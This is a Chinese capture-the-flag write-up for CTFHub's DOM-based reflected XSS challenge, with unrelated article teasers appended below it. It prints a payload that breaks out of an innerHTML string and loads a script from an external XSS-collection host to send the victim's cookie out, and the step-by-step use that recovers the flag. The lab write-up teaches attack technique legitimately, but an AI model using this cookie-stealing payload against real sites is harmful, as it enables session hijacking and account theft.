CTFHub XSS DOM反射 WriteUp

news/2024/5/19 22:26:06 标签: xss, 前端, 安全, 网络安全, ctf, web安全

前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台

在这里插入图片描述

1. 构造闭合语句

根据题目提示,判断网站存在DOM xss漏洞

查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围

<script>
        $("#text")[0].innerHTML = 'CTFHub is very niubility';
</script>

尝试闭合标签,这里用VS Code,可以高亮显示代码

CTFHub is very niubility 替换成以下内容:

';</script></textarea>'"><script src=http://xsscom.com//IqT8eH></script>

在这里插入图片描述

把代码整理一下,可以看到 script 标签成功闭合,插入了新的代码。
在这里插入图片描述

xsscookie_33">2. xss反弹cookie

首先先在上面的输入框输入';</script></textarea>'"><script src=http://xsscom.com//IqT8eH></script>提交

然后复制网站URL,粘贴到下面的输入框提交

在这里插入图片描述

返回到xss平台,已经接收到数据,flag就在cookie信息里

ctfhub{9e7dd9be02df8a0ea2ea15c0}

在这里插入图片描述

提交flag,本道题成功解出

在这里插入图片描述


http://www.niftyadmin.cn/n/1700062.html

相关文章

iOS开发学习笔记 2-9 C语言部分 内存分配函数 函数指针 指针函数 void*

为什么80%的码农都做不了架构师&#xff1f;>>> 一、内存分配函数 1、void * malloc(参数&#xff08;需要分配的内存空间的大小&#xff09;); void * malloc(参数1&#xff08;元素所占用空间大小&#xff09; * 参数2&#xff08;元素个数&#xff09;); 不会进…

Conda 新建虚拟环境失败

输入&#xff1a;conda create --name yourenvname python3.7 显示&#xff1a; 解决&#xff1a; 输入&#xff1a;conda clean -i

UNIMO:Towards Unified-Modal Understanding and Generation via Cross-Modal Contrastive Learning

**本文内容仅代表个人理解&#xff0c;如有错误&#xff0c;欢迎指正** 1. Points 1) UNIMO是一个预训练模型&#xff0c;其输入可以有不同的形式(eg, Image collections, Text corpus, Image-Text Pairs)&#xff0c;并且可以微调后用于单模态(Single-modal)任务与多模态(Mul…

CrossCLR: Cross-modal Contrastive Learning for Multi-modal Video Representations, 2021 ICCV

**本文内容仅代表个人理解&#xff0c;如有错误&#xff0c;欢迎指正** 1. Points 这篇论文主要解决两个问题 1. 跨模态对比学习(Cross-modal Contrastive learning)更注重于不同模态下的数据&#xff0c;而非同一模态下的数据。 - 也就是说&#xff0c;将不同模态下的数据…

给控件做数字签名之一:将控件打包为Web发布包 [转]

微软代码签名证书使用指南 http://www.wotrust.com/support/signcode_guide.htm 签名重要性&#xff1a;http://www.wotrust.com/FAQ/whySigning.htm 中国数字认证网 http://www.ca365.com/ SSL开放论坛 软件代码签名 http://www.openssl.com.cn/forum-22-1.html http://www.…

Deconfounded Visual Grounding

**本文内容仅代表个人理解&#xff0c;如有错误&#xff0c;欢迎指正** 1. Background knowledge * 这篇论文重度包含因果推理的相关知识&#xff0c;本文可能会粗略带过&#xff0c;感兴趣的可以去看看原论文&#xff0c;有比较详细的解释说明。 Q1: 什么是confounder&…

notepad拼心形_JavaNotePad 带有中文ASCII码转化,汉字统计 为拼音 Develop 238万源代码下载- www.pudn.com...

文件名称: JavaNotePad下载收藏√ [5 4 3 2 1 ]开发工具: Java文件大小: 122 KB上传时间: 2013-10-12下载次数: 0提 供 者: aulo详细说明&#xff1a;带有中文ASCII码转化&#xff0c;汉字统计&#xff0c;和汉字转化为拼音-ASCII code conversion with Chinese, Chinese …

Word2Pix: Word to Pixel Cross Attention Transformer in Visual Grounding,2021

**本文内容仅代表个人理解&#xff0c;如有错误&#xff0c;欢迎指正**​​​​​​​ 1. Problem 本篇论文主要解决的问题&#xff1a;将query编码成一个holistic sentence embedding&#xff0c;忽略了每个词对于Visual grounding框选的重要性&#xff0c;从而降低了模型的…